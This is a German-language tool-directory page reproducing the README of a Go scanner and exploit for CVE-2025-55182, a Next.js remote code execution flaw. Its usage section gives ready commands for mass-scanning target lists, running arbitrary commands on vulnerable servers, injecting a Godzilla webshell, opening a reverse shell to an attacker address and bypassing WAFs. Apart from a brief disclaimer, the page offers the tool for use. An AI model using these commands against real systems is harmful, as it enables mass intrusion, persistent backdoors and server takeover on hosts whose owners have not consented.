Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-POC — Go-basierter Scanner und Exploitation-Tool für CVE-2025-55182 (Next.js RCE). Unterstützt Batch-Scanning, Befehlsausführung, Godzilla Memory Shell Injection, Reverse Shell und WAF-Bypass. | Kitploit
Tools/GitHubGitHub/luoqichen/cve-2025-55182-poc
SchwachstellenscannerExploitationShellcodeWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubluoqichen/cve-2025-55182-poc

CVE-2025-55182-POC

Go-basierter Scanner und Exploitation-Tool für CVE-2025-55182 (Next.js RCE). Unterstützt Batch-Scanning, Befehlsausführung, Godzilla Memory Shell Injection, Reverse Shell und WAF-Bypass.

Repository anzeigen
6vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 Next.js RCE Scanner

License

CVE-2025-55182 Schwachstellenscanner und Exploit-Tool für die Remote-Codeausführung in Next.js-Anwendungen. Unterstützt Massenscans, Befehlsausführung, Godzilla-Webshell-Injektion und Reverse-Shell-Funktionen.

⚠️ Dieses Tool ist nur für Sicherheitsforschung und autorisierte Tests bestimmt. Nicht für illegale Zwecke verwenden.

Funktionen

  • Mehrere Ziele scannen: Unterstützt einzelne URLs, Dateilisten (eine URL pro Zeile) sowie Ordner mit mehreren .txt-Dateien.
  • Mehrere Threads parallel: Anpassbare Anzahl von Threads für erhöhte Scaneffizienz.
  • Schwachstellenverifizierung: Überprüft das Vorhandensein der Schwachstelle durch Berechnung des Produkts von Zufallszahlen.
  • Befehlsausführung: Führt beliebige Systembefehle auf dem anfälligen Ziel aus (unterstützt Linux und Windows).
  • Godzilla-Webshell-Injektion: Erzeugt mit einem Klick die Verbindungsinformationen für eine Godzilla-Webshell.
  • Reverse Shell: Unterstützt Reverse-Shell-Funktionen.
  • Ergebnisse speichern: Speichert automatisch erfolgreich genutzte URLs und Details in success.json und optional Ausgabe der Schwachstellen-URLs in eine angegebene Datei.
  • Proxy-Unterstützung: Konfigurierbarer HTTP-Proxy für die Integration mit Tools wie Burp Suite.
  • Fortschrittsanzeige: Zeigt in Echtzeit Scanfortschritt, verstrichene Zeit, verbleibende Zeit usw. an.
  • []

    Installation

    Voraussetzungen

    • Go 1.16 oder höher
    • Git

    Repository klonen

    root@kitploit:~
    git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
    cd cve-2025-55182-POC
    

    Kompilieren

    root@kitploit:~
    go build -o cve-2025-55182 main.go
    

    Ausführen

    root@kitploit:~
    ./cve-2025-55182 -h
    

    Verwendung

    Parameterbeschreibung

    ParameterTypStandardwertBeschreibung
    -ustringKeinEinzelne Ziel-URL (z.B. http://example.com:3000)
    -fstringKeinDatei mit URL-Liste (eine URL pro Zeile)
    -dstringKeinOrdner mit mehreren .txt-Dateien
    -ostringKeinAusgabedatei (speichert Schwachstellen-URLs, eine pro Zeile)
    -tint10Anzahl der gleichzeitigen Threads
    -toint10Anfrage-Timeout (Sekunden)
    -cstringKeinAuszuführender Befehl (z.B. id)
    -mstringKeinModus: waf (aktiviert WAF-Bypass)
    -pstringKeinHTTP-Proxy (z.B. http://127.0.0.1:8080)
    -gboolfalseGodzilla-Webshell-Injektion aktivieren
    -rsstringKeinReverse-Shell-Adresse (Format IP:PORT)
    -dvboolfalseAusführlicher Modus (druckt Scanvorgang für jede URL)
    -esboolfalseScannen auf sensible Informationen

    Beispiele

    Einzelnes Ziel scannen

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000
    

    Batch-Scan von Zielen aus einer Datei

    root@kitploit:~
    ./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
    

    Befehl ausführen

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -c "whoami"
    

    Godzilla-Webshell verwenden

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -g
    

    Nach erfolgreicher Injektion gibt das Tool die Verbindungs-URL, das Passwort, den Schlüssel und die Header-Informationen für Godzilla aus.

    Reverse Shell

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
    

    Proxy aktivieren

    root@kitploit:~
    ./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
    

    Ausgabebeschreibung

    • success.json: Speichert automatisch alle Details erfolgreich genutzter Ziele (einschließlich Befehlsausgabe, Godzilla-Konfiguration usw.).
    • Durch -o angegebene Datei: Speichert die Liste der Schwachstellen-URLs (eine pro Zeile).

    Während des Scans werden Fortschrittsbalken und gefundene Schwachstellen in Echtzeit angezeigt. Am Ende werden statistische Informationen ausgegeben.

    Hinweise

    1. Stellen Sie sicher, dass Sie autorisiert sind: Das Scannen oder Angreifen fremder Systeme ohne Erlaubnis ist illegal.
    2. Proxy-Verwendung: Wenn Sie den Datenverkehr über Burp Suite anzeigen möchten, setzen Sie den Proxy mit dem Parameter -p.
    3. Godzilla-Verbindung: Verwenden Sie nach erfolgreicher Injektion einen Godzilla-Client zur Verbindung. Beachten Sie, dass Passwort und Schlüssel zufällig generiert werden.
    4. Timeout-Einstellung: Für Ziele mit schlechter Netzwerkverbindung kann der Wert von -to entsprechend erhöht werden.

    Haftungsausschluss

    Dieses Tool dient ausschließlich der Sicherheitsforschung und autorisierten Tests. Der Benutzer trägt die alleinige rechtliche Verantwortung. Der Entwickler haftet nicht für Missbrauch.

    License

    MIT

    Tool herunterladen